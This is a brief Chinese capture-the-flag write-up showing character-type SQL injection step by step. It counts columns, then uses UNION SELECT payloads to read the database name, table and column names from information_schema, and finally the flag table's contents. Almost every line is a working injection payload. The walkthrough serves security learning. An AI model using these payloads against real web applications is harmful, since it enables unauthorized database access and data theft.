字符型注入
-
输入1,2,3
发现只有1,2回显,证明数据库中只有两条数据
-
输入1 order 2 查询字段数
-
使用整形注入后发现,无法注入成功,考虑字符型注入,
-1’ union select 1,database()
可得知数据库名为sqli
-
查询该数据库下的表名
-1’ union select 1 ,group_concat(table_name) from information_schema.tables where table_schema=‘sqli’#
得出表名有新闻和标志 -
查询flag的所有字段名
-1’ union select 1 ,group_concat(column_name) from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’#
-
查询该库该表的列的内容
-1’ union select 1,group_concat(flag) from sqli.flag#
得出flag